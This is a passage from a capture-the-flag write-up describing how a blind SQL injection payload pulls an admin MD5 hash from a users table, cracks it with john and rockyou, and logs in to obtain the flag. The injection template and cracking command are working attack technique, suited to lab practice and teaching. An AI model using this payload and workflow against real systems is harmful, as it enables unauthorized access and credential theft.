![c127d8d8f0dffefd0353e093aa0e156b.png](96c01959297c425ebd36f0a5e1cba0be.png)
Using our same blind sqli script from `0x01`, we can grab the password from the database
````
"username":f"admin' AND (substr((select password from users limit 0,1),1,{len(found_chars) + 1})) = '{found_chars + i}'#",
````
Which gives us:
`40ade195ed600eb731c86e084b6a42b3` which is an **md5** hash. Using john to crack it with the `rockyou` wordlist
`john hash.txt wordlist=~/wordlists/password/rockyou.txt --format=Raw-MD5`
`40ade195ed600eb731c86e084b6a42b3:whereismymind`
Logging in with `admin:whereismymind`
![1ae29c7a8b62d66bb5bd93ca8bf883ce.png](3ec0a017275a471aa1e4b18db47de575.png)
`flag{just_an_err0r_0f_thinking!}`
---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]
Tags: #ctf #web #sqli #blind
Related: